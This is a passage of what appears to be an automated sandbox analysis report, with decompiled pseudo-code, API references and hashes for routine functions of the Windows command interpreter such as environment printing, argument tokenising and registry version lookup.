                                                    0x011f2d37
                                                    0x011f2d3c
                                                    0x011f2d3c
                                                    0x011f2d53

                                                    APIs
                                                    • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 011F2CA5
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F2CB7
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011F2D29
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseErrorHandleLastOpenSemaphore
                                                    • String ID: _p0$wil
                                                    • API String ID: 3419097560-1814513734
                                                    • Opcode ID: 7b39d931cc50ce7435aea43c0b143335bf92b3e1e5908fbd213a410e3b60aff0
                                                    • Instruction ID: 5ef3c9a16b988b78459f583e3ef312d357a3e061fc114252ff7629f96343635a
                                                    • Opcode Fuzzy Hash: 7b39d931cc50ce7435aea43c0b143335bf92b3e1e5908fbd213a410e3b60aff0
                                                    • Instruction Fuzzy Hash: 7D411971A001298BDB3DDF68C958BEA37B5EB94710F1582ACDA09DB284DB70CD45CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F4588, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E011F4588(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short* _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t33;
				void* _t38;
				intOrPtr _t41;
				void* _t47;
				void* _t49;
				intOrPtr* _t50;
				signed int _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t58;
				void* _t59;

				_t33 =  *0x1203834;
				_v20 = __ecx;
				if(_t33 != 0) {
					_t53 = E011DDF40(E011DDEF9(__ecx));
					_v12 = _t53;
					if(_t53 == 0) {
						L2:
						return 1;
					}
					_t47 = 0x20;
					_t23 = E011E2349(_t53, _t47);
					if(_t23 != 0) {
						 *_t23 = 0;
					}
					_t50 = _t53;
					_v16 = 0;
					_t4 = _t50 + 2; // 0x2
					_t38 = _t4;
					do {
						_t24 =  *_t50;
						_t50 = _t50 + 2;
					} while (_t24 != 0);
					_t54 = _t33;
					_t52 = _t50 - _t38 >> 1;
					_v8 = 1;
					_t41 = _t54 + 2;
					do {
						_t25 =  *_t54;
						_t54 = _t54 + 2;
					} while (_t25 != 0);
					_t55 = _t54 - _t41;
					_t56 = _t55 >> 1;
					if(_t55 == 0) {
						L22:
						E011DC5A2(_t41, 0x400023a9, 1, _v20);
						L23:
						E011E0040(_v12);
						return _v8;
					}
					while( *0x11fd544 == 0) {
						if(_t56 < _t52) {
							L15:
							_t41 = _v8;
							L16:
							_t33 = _t33 + _t56 * 2 + 2;
							_t57 = _t33;
							_t49 = _t57 + 2;
							do {
								_t25 =  *_t57;
								_t57 = _t57 + 2;
							} while (_t25 != _v16);
							_t58 = _t57 - _t49;
							_t56 = _t58 >> 1;
							if(_t58 != 0) {
								continue;
							}
							L21:
							if(_t41 == 0) {
								goto L23;
							}
							goto L22;
						}
						__imp___wcsnicmp(_t33, _v12, _t52);
						_t59 = _t59 + 0xc;
						if(_t25 != 0) {
							goto L15;
						}
						_push(_t33);
						E011E25D9(L"%s\r\n");
						_t41 = 0;
						_v8 = 0;
						goto L16;
					}
					_t41 = _v8;
					goto L21;
				}
				_push("Null environment");
				fprintf(E011E7721(__ecx, 2), "\nCMD Internal Error %s\n");
				goto L2;
			}
























                                                    0x011f4591
                                                    0x011f4599
                                                    0x011f45a0
                                                    0x011f45d2
                                                    0x011f45d4
                                                    0x011f45d9
                                                    0x011f45be
                                                    0x00000000
                                                    0x011f45c0
                                                    0x011f45dd
                                                    0x011f45e0
                                                    0x011f45e7
                                                    0x011f45eb
                                                    0x011f45eb
                                                    0x011f45ee
                                                    0x011f45f2
                                                    0x011f45f5
                                                    0x011f45f5
                                                    0x011f45f8
                                                    0x011f45f8
                                                    0x011f45fb
                                                    0x011f45fe
                                                    0x011f4605
                                                    0x011f4609
                                                    0x011f460c
                                                    0x011f460f
                                                    0x011f4612
                                                    0x011f4612
                                                    0x011f4615
                                                    0x011f4618
                                                    0x011f461d
                                                    0x011f461f
                                                    0x011f4621
                                                    0x011f4681
                                                    0x011f468b
                                                    0x011f4693
                                                    0x011f4696
                                                    0x00000000
                                                    0x011f469b
                                                    0x011f4623
                                                    0x011f462e
                                                    0x011f4658
                                                    0x011f4658
                                                    0x011f465b
                                                    0x011f465e
                                                    0x011f4661
                                                    0x011f4663
                                                    0x011f4666
                                                    0x011f4666
                                                    0x011f4669
                                                    0x011f466c
                                                    0x011f4672
                                                    0x011f4674
                                                    0x011f4676
                                                    0x00000000
                                                    0x00000000
                                                    0x011f467d
                                                    0x011f467f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f467f
                                                    0x011f4635
                                                    0x011f463b
                                                    0x011f4640
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4642
                                                    0x011f4648
                                                    0x011f4651
                                                    0x011f4653
                                                    0x00000000
                                                    0x011f4653
                                                    0x011f467a
                                                    0x00000000
                                                    0x011f467a
                                                    0x011f45a2
                                                    0x011f45b5
                                                    0x00000000

                                                    APIs
                                                    • _wcsnicmp.MSVCRT ref: 011F4635
                                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                                    • fprintf.MSVCRT ref: 011F45B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: __iob_func_wcsnicmpfprintf
                                                    • String ID: CMD Internal Error %s$%s$Null environment
                                                    • API String ID: 1828771275-2781220306
                                                    • Opcode ID: 73c35d796b22afe0064f1cbfefa068b9d0b0a510060282d93b54ee9e2b7a0c57
                                                    • Instruction ID: 5ff6aa4390d4c47a6fd76ce5ab5c55080b935e425ef280e3173e00a2876c3549
                                                    • Opcode Fuzzy Hash: 73c35d796b22afe0064f1cbfefa068b9d0b0a510060282d93b54ee9e2b7a0c57
                                                    • Instruction Fuzzy Hash: 90315D36E00211DBCF3CEFAC98496AFB7A4EF94614F05056DEE1AA3A40EB705E01C785
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D68D9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E011D68D9(void* __ecx, intOrPtr __edx, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t16;
				signed int _t19;
				signed int _t21;
				intOrPtr _t24;
				signed int _t38;
				long _t40;
				signed short* _t44;

				_push(__ecx);
				_push(__ecx);
				_v12 = __edx;
				_t44 = E011DDEF9(__ecx);
				_t16 =  *_t44 & 0x0000ffff;
				if(_t16 != 0x3a) {
					if(_t16 != 0x2b) {
						goto L2;
					} else {
						goto L1;
					}
					L10:
					_t19 = _v8;
					 *((short*)(_v12 + _t19 * 2)) = 0;
					return _t19;
					L17:
				} else {
					L1:
					_t44 =  &(_t44[1]);
				}
				L2:
				_t24 = _a8;
				if(_t24 == 0) {
					_t44 = E011DDEF9(_t44);
				}
				_v8 = _v8 & 0x00000000;
				_t40 =  *_t44 & 0x0000ffff;
				while(_t24 == 0 || wcschr(L"=,;", _t40) == 0) {
					if(wcschr(L"+:\n\r\t ", _t40) == 0) {
						if(_t24 == 0) {
							if(E011DD7D4(L"&<|>", _t40) == 0) {
								if(_t40 != 0x5e) {
									goto L8;
								} else {
									_t44 =  &(_t44[1]);
									_t38 =  *_t44 & 0x0000ffff;
									goto L9;
								}
								goto L17;
							}
						} else {
							L8:
							_t38 = _t40 & 0x0000ffff;
							L9:
							_t32 = _v8;
							_t44 =  &(_t44[1]);
							_t7 = _t32 + 1; // 0x1
							_t21 = _t7;
							 *(_v12 + _v8 * 2) = _t38;
							_t40 =  *_t44 & 0x0000ffff;
							_v8 = _t21;
							if(_t21 < 0x7f) {
								continue;
							}
						}
					}
					goto L10;
				}
				goto L10;
			}












                                                    0x011d68de
                                                    0x011d68df
                                                    0x011d68e3
                                                    0x011d68eb
                                                    0x011d68ed
                                                    0x011d68f3
                                                    0x011d6970
                                                    0x00000000
                                                    0x011d6972
                                                    0x00000000
                                                    0x011d6972
                                                    0x011d6958
                                                    0x011d6958
                                                    0x011d6963
                                                    0x011d696a
                                                    0x00000000
                                                    0x011d68f5
                                                    0x011d68f5
                                                    0x011d68f5
                                                    0x011d68f5
                                                    0x011d68f8
                                                    0x011d68f8
                                                    0x011d68fd
                                                    0x011ebe67
                                                    0x011ebe67
                                                    0x011d6903
                                                    0x011d6907
                                                    0x011d690a
                                                    0x011d6930
                                                    0x011d6934
                                                    0x011ebe7c
                                                    0x011ebe86
                                                    0x00000000
                                                    0x011ebe8c
                                                    0x011ebe8c
                                                    0x011ebe8f
                                                    0x00000000
                                                    0x011ebe8f
                                                    0x00000000
                                                    0x011ebe86
                                                    0x011d693a
                                                    0x011d693a
                                                    0x011d693a
                                                    0x011d693d
                                                    0x011d693d
                                                    0x011d6940
                                                    0x011d6946
                                                    0x011d6946
                                                    0x011d6949
                                                    0x011d694d
                                                    0x011d6950
                                                    0x011d6956
                                                    0x00000000
                                                    0x00000000
                                                    0x011d6956
                                                    0x011d6934
                                                    0x00000000
                                                    0x011d6930
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011DDEF9: iswspace.MSVCRT ref: 011DDF07
                                                      • Part of subcall function 011DDEF9: wcschr.MSVCRT ref: 011DDF18
                                                    • wcschr.MSVCRT ref: 011D6914
                                                    • wcschr.MSVCRT ref: 011D6926
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: wcschr$iswspace
                                                    • String ID: &<|>$+: $=,;
                                                    • API String ID: 3458554142-2256444845
                                                    • Opcode ID: 1a0e87eabb4008aed4f71cb8701fde41ff4a6be9fbfd52bb5a0bc74dbcca669f
                                                    • Instruction ID: a9fe4d00383210e98b869d9fe7eb476e0939fec3fc86c21e78e800352c0d37be
                                                    • Opcode Fuzzy Hash: 1a0e87eabb4008aed4f71cb8701fde41ff4a6be9fbfd52bb5a0bc74dbcca669f
                                                    • Instruction Fuzzy Hash: F5213672A44266EECB3C8B6AD4146BEB7E6EFA5624B25406EE9C4D7281FB315C40C350
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D4476, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011D4476() {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				long _t17;
				int _t20;

				_t20 = 4;
				_v16 = _t20;
				if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x2000000,  &_v8) != 0) {
					L5:
					return 0;
				}
				_v12 = _t20;
				_t17 = RegQueryValueExW(_v8, L"UBR", 0,  &_v12,  &_v20,  &_v16);
				RegCloseKey(_v8);
				if(_t17 != 0 || _v12 != _t20) {
					goto L5;
				} else {
					return _v20;
				}
			}









                                                    0x011d4481
                                                    0x011d4485
                                                    0x011d44a2
                                                    0x011d44e1
                                                    0x00000000
                                                    0x011d44e1
                                                    0x011d44a8
                                                    0x011d44be
                                                    0x011d44c9
                                                    0x011d44d2
                                                    0x00000000
                                                    0x011d44d9
                                                    0x00000000
                                                    0x011d44d9

                                                    APIs
                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 011D449A
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 011D44BE
                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011D44C9
                                                    Strings
                                                    • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 011D4490
                                                    • UBR, xrefs: 011D44B6
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                    • API String ID: 3677997916-3870813718
                                                    • Opcode ID: 341782f4096967f6999651fb1b218e099537412315344c0bf1d0db6685606b0c
                                                    • Instruction ID: cf61cfdaed9bdab0fba005ebbc4d1a8afd27dee39561569764b46a22f792f7b7
                                                    • Opcode Fuzzy Hash: 341782f4096967f6999651fb1b218e099537412315344c0bf1d0db6685606b0c
                                                    • Instruction Fuzzy Hash: 2D011D76A80218BBDF32DA95EC49FEEBBBCEB84710F140166E901A2541D7705A90DB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E465D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 38%
                                                    			E011E465D(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				int _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t3 ^ _t20;
				_t18 =  *0x11fd5f8; // 0x0
				if(_t18 != 0) {
					L6:
					 *0x12194b4(0);
					_t6 =  *_t18();
					L7:
					_pop(_t19);
					return E011E6FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
				}
				_t8 =  *0x11fd0d0; // 0xffffffff
				if(_t8 != 0xffffffff) {
					L3:
					if(_t8 != 0) {
						_t18 = GetProcAddress(_t8, "SetThreadUILanguage");
						 *0x11fd5f8 = _t18;
					}
					L5:
					if(_t18 == 0) {
						_t6 = SetThreadLocale(0x409);
						goto L7;
					}
					goto L6;
				}
				_t8 = GetModuleHandleW(L"KERNEL32.DLL");
				_t18 =  *0x11fd5f8; // 0x0
				 *0x11fd0d0 = _t8;
				if(_t8 == 0xffffffff) {
					goto L5;
				}
				goto L3;
			}














                                                    0x011e4662
                                                    0x011e4663
                                                    0x011e466a
                                                    0x011e466e
                                                    0x011e4676
                                                    0x011e46bd
                                                    0x011e46c1
                                                    0x011e46c7
                                                    0x011e46c9
                                                    0x011e46ce
                                                    0x011e46d7
                                                    0x011e46d7
                                                    0x011e4678
                                                    0x011e4680
                                                    0x011e469d
                                                    0x011e469f
                                                    0x011e46ad
                                                    0x011e46af
                                                    0x011e46af
                                                    0x011e46b5
                                                    0x011e46b7
                                                    0x011ee8ad
                                                    0x00000000
                                                    0x011ee8ad
                                                    0x00000000
                                                    0x011e46b7
                                                    0x011e4687
                                                    0x011e468d
                                                    0x011e4693
                                                    0x011e469b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                    • API String ID: 1646373207-2530943252
                                                    • Opcode ID: 080c9b530a108bded239eefbbd1e3a92f6c5b5adacabc531f5a9a98d98c50c2f
                                                    • Instruction ID: 3b5fc911d88dba34504388ba82aaf093f55f1a55b3758242c60c83724ef66324
                                                    • Opcode Fuzzy Hash: 080c9b530a108bded239eefbbd1e3a92f6c5b5adacabc531f5a9a98d98c50c2f
                                                    • Instruction Fuzzy Hash: 6601A730940614DBCB3C9BA8B81CB693BE49B58A2DB05026DF936DB284CF705C819B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E1F52, Relevance: 7.8, APIs: 5, Instructions: 293COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E011E1F52(void* __ebx, wchar_t* __ecx, wchar_t* __edx, void* __edi, void* __esi, void* __eflags) {
				wchar_t* _t92;
				void* _t104;
				void* _t108;
				wchar_t* _t110;
				wchar_t** _t111;
				long _t117;
				short* _t118;
				void _t121;
				void* _t123;
				long _t128;
				wchar_t* _t130;
				wchar_t* _t137;
				void* _t146;
				wchar_t** _t155;
				wchar_t** _t158;
				void _t164;
				wchar_t* _t168;
				void _t171;
				intOrPtr _t175;
				long* _t180;
				void* _t188;
				signed int _t191;
				void _t199;
				void* _t203;
				void* _t204;
				wchar_t** _t205;
				long* _t206;
				void* _t207;
				wchar_t* _t209;
				long* _t217;
				void _t218;
				signed int _t220;
				wchar_t* _t223;
				void _t224;
				wchar_t* _t225;
				void* _t226;

				_push(0xc0);
				_push(0x11fbdb8);
				E011E75CC(__ebx, __edi, __esi);
				_t216 = __edx;
				_t223 = __ecx;
				 *(_t226 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t226 - 0xc4)) = __edx;
				_t92 =  *(_t226 + 0xc);
				 *(_t226 - 0xc0) = _t92;
				 *(_t226 - 0xb8) = _t92;
				 *((intOrPtr*)(_t226 - 0xb4)) = 0x90;
				 *((intOrPtr*)(_t226 - 0xb0)) = 5;
				memset(_t226 - 0xac, 0, 0x88);
				 *((intOrPtr*)(_t226 - 0xcc)) = 0;
				_t155 =  *0x1213cc4;
				_t155[0xc] = 0;
				 *0x11fd0da = 0;
				 *((intOrPtr*)(_t226 - 4)) = 0;
				 *(_t226 - 0xac) =  *(_t226 - 0xc0);
				_push(0x3a);
				if( *0x1213cc9 == 0) {
					_pop(_t224);
				} else {
					_pop(_t224);
					if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x38)))) == _t224) {
						 *(_t226 - 0xac) =  *(_t155[0x44]);
					}
				}
				if(E011E7797(_t155) == 0) {
					_t157 = 1;
					goto L5;
				} else {
					 *((intOrPtr*)(_t226 - 0xc8)) = 0;
					_t146 =  *0x121c010(_t226 - 0xb4, _t226 - 0xcc,  &(( *0x1213cc4)[0xc]), _t216, _t226 - 0xc8);
					_t157 = 1;
					if(_t146 == 1) {
						__eflags =  *((intOrPtr*)(_t226 - 0xc8)) - 1;
						if( *((intOrPtr*)(_t226 - 0xc8)) == 1) {
							_push(0);
							_push(0x4ec);
							E011DC5A2(1);
							_t157 = 1;
							__eflags = 1;
						}
						 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
						L35:
						return E011E7614(0, _t216, _t224);
					}
					L5:
					 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
					_t199 =  *(_t226 - 0xc0);
					 *0x11fd0da = _t157;
					_t158 =  *0x1213cc4;
					_t158[2] = 0;
					 *_t158 = _t216;
					_t97 =  *(_t226 + 8);
					_t158[1] =  *(_t226 + 8);
					if( *0x1213cc9 == 0) {
						L38:
						__eflags = E011E2D22(_t216, _t97, _t199);
						if(__eflags == 0) {
							L8:
							_t216 = 0x2000;
							E011E2A7C(_t226 - 0xc0, 0x2000, _t235);
							_t224 =  *(_t226 - 0xc0);
							if(_t224 == 0) {
								_push(0);
								L47:
								__imp__??_V@YAXPAX@Z();
								L48:
								goto L35;
							}
							E011E1040(_t224, 0x2000, ( *(_t226 - 0xbc))[0xe]);
							_t164 = _t224;
							_t203 = _t164 + 2;
							do {
								_t104 =  *_t164;
								_t164 = _t164 + 2;
							} while (_t104 != 0);
							_t168 = _t224 + ((_t164 - _t203 >> 1) + 1) * 2;
							 *(_t226 - 0xb8) = _t168;
							 *_t168 = 0;
							_t106 =  *(_t226 - 0xbc);
							if(( *(_t226 - 0xbc))[0xf] != 0) {
								_t216 = 0x2000 - (_t168 - _t224 >> 1);
								E011E1040(_t168, 0x2000, _t106[0xf]);
							}
							E011E2A06(( *0x1213cc4)[3], _t216);
							_t171 = _t224;
							_t204 = _t171 + 2;
							do {
								_t108 =  *_t171;
								_t171 = _t171 + 2;
							} while (_t108 != 0);
							( *0x1213cc4)[0x19] = _t171 - _t204 >> 1;
							_t110 = E011DDF40(_t224);
							_t205 =  *0x1213cc4;
							_t205[0xf] = _t110;
							if(_t110 == 0) {
								L49:
								_push(_t224);
								goto L47;
							}
							_t205[0x23] = _t110;
							_t111 =  &(_t205[0x1a]);
							_t175 = 9;
							 *((intOrPtr*)(_t226 - 0xc4)) = _t175;
							do {
								 *((intOrPtr*)(_t111 - 0x28)) = 0;
								 *_t111 = 0;
								_t111 =  &(_t111[1]);
								_t175 = _t175 - 1;
							} while (_t175 != 0);
							_t216 =  *(_t226 - 0xb8);
							if( *_t216 == 0) {
								_t205[0xe] = 0;
								_t205[0xd] = 0;
								L34:
								_t205[4] =  *0x1213cd8;
								__imp__??_V@YAXPAX@Z(_t224);
								goto L35;
							}
							_t206 = E011DDF40(_t216 + wcsspn(_t216, L" \t") * 2);
							( *0x1213cc4)[0xd] = _t206;
							if(_t206 == 0) {
								goto L49;
							}
							_t180 = _t206;
							_t56 =  &(_t180[0]); // 0x2
							_t216 = _t56;
							do {
								_t117 =  *_t180;
								_t180 =  &(_t180[0]);
							} while (_t117 != 0);
							_t118 = _t206 + (_t180 - _t216 >> 1) * 2;
							while(_t118 != _t206) {
								_t191 =  *(_t118 - 2) & 0x0000ffff;
								if(_t191 == 0x20 || _t191 ==  *((intOrPtr*)(_t226 - 0xc4))) {
									_t118 = _t118 + 0xfffffffe;
									continue;
								} else {
									break;
								}
							}
							 *_t118 = 0;
							if( *0x1213cc9 == 0) {
								_t217 = ( *0x1213cc4)[0xd];
								while(1) {
									_t207 = 0x2f;
									_t216 = E011DD7D4(_t217, _t207);
									 *(_t226 - 0xb8) = _t216;
									__eflags = _t216;
									if(_t216 == 0) {
										goto L27;
									}
									_t217 =  &(_t216[0]);
									_t128 = towupper( *_t217 & 0x0000ffff);
									__eflags = _t128 - 0x51;
									if(_t128 != 0x51) {
										continue;
									}
									 *0x11fd0c8 = 0;
									_t190 =  *(_t226 - 0xb8);
									_t209 =  *(_t226 - 0xb8);
									 *(_t226 - 0xb8) =  &(_t209[0]);
									do {
										_t130 =  *_t209;
										_t209 =  &(_t209[0]);
										__eflags = _t130;
									} while (_t130 != 0);
									_t90 =  &(_t217[0]); // 0x0
									E011E1040(_t190, (_t209 -  *(_t226 - 0xb8) >> 1) + 1, _t90);
									goto L27;
								}
							}
							L27:
							_t121 = E011DEA40(( *0x1213cc4)[0xd], 0, 0);
							 *(_t226 - 0xc0) = _t121;
							_t205 =  *0x1213cc4;
							if( *_t121 == 0) {
								L33:
								_t205[0xe] = _t121;
								goto L34;
							}
							_t216 =  &(_t205[0x1a]);
							 *(_t226 - 0xbc) = _t216;
							_t188 = 1;
							while(_t188 < 0xa) {
								 *(_t216 - 0x28) = _t121;
								_t218 = _t121;
								_t66 = _t218 + 2; // 0x2
								 *(_t226 - 0xb8) = _t66;
								do {
									_t123 =  *_t218;
									_t218 = _t218 + 2;
								} while (_t123 != 0);
								_t220 = _t218 -  *(_t226 - 0xb8) >> 1;
								 *( *(_t226 - 0xbc)) = _t220;
								_t121 =  *(_t226 - 0xc0) + _t220 * 2 + 2;
								 *(_t226 - 0xc0) = _t121;
								_t188 = _t188 + 1;
								_t216 =  &(( *(_t226 - 0xbc))[1]);
								 *(_t226 - 0xbc) = _t216;
								if( *_t121 != 0) {
									continue;
								}
								goto L33;
							}
							goto L33;
						}
						goto L48;
					}
					_t137 =  *(_t226 - 0xbc);
					_t235 =  *(_t137[0xe]) - _t224;
					if( *(_t137[0xe]) != _t224) {
						_t97 =  *(_t226 + 8);
						goto L38;
					}
					_t225 = _t158[0x44];
					E011E1040(_t216,  *(_t226 + 8),  *_t225);
					( *0x1213cc4)[2] = _t225[2];
					goto L8;
				}
			}







































                                                    0x011e1f52
                                                    0x011e1f57
                                                    0x011e1f5c
                                                    0x011e1f61
                                                    0x011e1f63
                                                    0x011e1f65
                                                    0x011e1f6b
                                                    0x011e1f71
                                                    0x011e1f74
                                                    0x011e1f7a
                                                    0x011e1f80
                                                    0x011e1f8a
                                                    0x011e1fa3
                                                    0x011e1fab
                                                    0x011e1fb1
                                                    0x011e1fb7
                                                    0x011e1fba
                                                    0x011e1fc0
                                                    0x011e1fc9
                                                    0x011e1fcf
                                                    0x011e1fd7
                                                    0x011ed476
                                                    0x011e1fdd
                                                    0x011e1fe0
                                                    0x011e1fe4
                                                    0x011e1fee
                                                    0x011e1fee
                                                    0x011e1fe4
                                                    0x011e1ffb
                                                    0x011ed4a4
                                                    0x00000000
                                                    0x011e2001
                                                    0x011e2001
                                                    0x011e2026
                                                    0x011e202e
                                                    0x011e2031
                                                    0x011ed47c
                                                    0x011ed482
                                                    0x011ed484
                                                    0x011ed485
                                                    0x011ed48a
                                                    0x011ed493
                                                    0x011ed493
                                                    0x011ed493
                                                    0x011ed494
                                                    0x011e2281
                                                    0x011e2286
                                                    0x011e2286
                                                    0x011e2037
                                                    0x011e2037
                                                    0x011e203e
                                                    0x011e2044
                                                    0x011e204a
                                                    0x011e2050
                                                    0x011e2053
                                                    0x011e2055
                                                    0x011e2058
                                                    0x011e2062
                                                    0x011e2294
                                                    0x011e229e
                                                    0x011e22a0
                                                    0x011e2098
                                                    0x011e2098
                                                    0x011e20a5
                                                    0x011e20aa
                                                    0x011e20b2
                                                    0x011ed4fa
                                                    0x011ed4fb
                                                    0x011ed4fb
                                                    0x011ed502
                                                    0x00000000
                                                    0x011ed504
                                                    0x011e20c5
                                                    0x011e20ca
                                                    0x011e20cc
                                                    0x011e20cf
                                                    0x011e20cf
                                                    0x011e20d2
                                                    0x011e20d5
                                                    0x011e20df
                                                    0x011e20e2
                                                    0x011e20ea
                                                    0x011e20ed
                                                    0x011e20f7
                                                    0x011e2102
                                                    0x011e2106
                                                    0x011e2106
                                                    0x011e2114
                                                    0x011e2119
                                                    0x011e211b
                                                    0x011e211e
                                                    0x011e211e
                                                    0x011e2121
                                                    0x011e2124
                                                    0x011e2132
                                                    0x011e2137
                                                    0x011e213c
                                                    0x011e2142
                                                    0x011e2147
                                                    0x011ed50c
                                                    0x011ed50c
                                                    0x00000000
                                                    0x011ed50c
                                                    0x011e214d
                                                    0x011e2153
                                                    0x011e2158
                                                    0x011e2159
                                                    0x011e215f
                                                    0x011e215f
                                                    0x011e2162
                                                    0x011e2164
                                                    0x011e2167
                                                    0x011e2167
                                                    0x011e216c
                                                    0x011e2175
                                                    0x011e22ab
                                                    0x011e22ae
                                                    0x011e226f
                                                    0x011e2274
                                                    0x011e2278
                                                    0x00000000
                                                    0x011e227f
                                                    0x011e2191
                                                    0x011e2198
                                                    0x011e219d
                                                    0x00000000
                                                    0x00000000
                                                    0x011e21a3
                                                    0x011e21a5
                                                    0x011e21a5
                                                    0x011e21a8
                                                    0x011e21a8
                                                    0x011e21ab
                                                    0x011e21ae
                                                    0x011e21b7
                                                    0x011e21ba
                                                    0x011e21be
                                                    0x011e21c5
                                                    0x011e2289
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e21c5
                                                    0x011e21da
                                                    0x011e21e3
                                                    0x011ed514
                                                    0x011ed517
                                                    0x011ed519
                                                    0x011ed521
                                                    0x011ed523
                                                    0x011ed529
                                                    0x011ed52b
                                                    0x00000000
                                                    0x00000000
                                                    0x011ed531
                                                    0x011ed538
                                                    0x011ed53f
                                                    0x011ed543
                                                    0x00000000
                                                    0x00000000
                                                    0x011ed545
                                                    0x011ed54b
                                                    0x011ed551
                                                    0x011ed556
                                                    0x011ed55c
                                                    0x011ed55c
                                                    0x011ed55f
                                                    0x011ed562
                                                    0x011ed562
                                                    0x011ed56f
                                                    0x011ed574
                                                    0x00000000
                                                    0x011ed574
                                                    0x011ed517
                                                    0x011e21e9
                                                    0x011e21f5
                                                    0x011e21fa
                                                    0x011e2200
                                                    0x011e2209
                                                    0x011e226c
                                                    0x011e226c
                                                    0x00000000
                                                    0x011e226c
                                                    0x011e220b
                                                    0x011e220e
                                                    0x011e2216
                                                    0x011e2217
                                                    0x011e221c
                                                    0x011e221f
                                                    0x011e2221
                                                    0x011e2224
                                                    0x011e222a
                                                    0x011e222a
                                                    0x011e222d
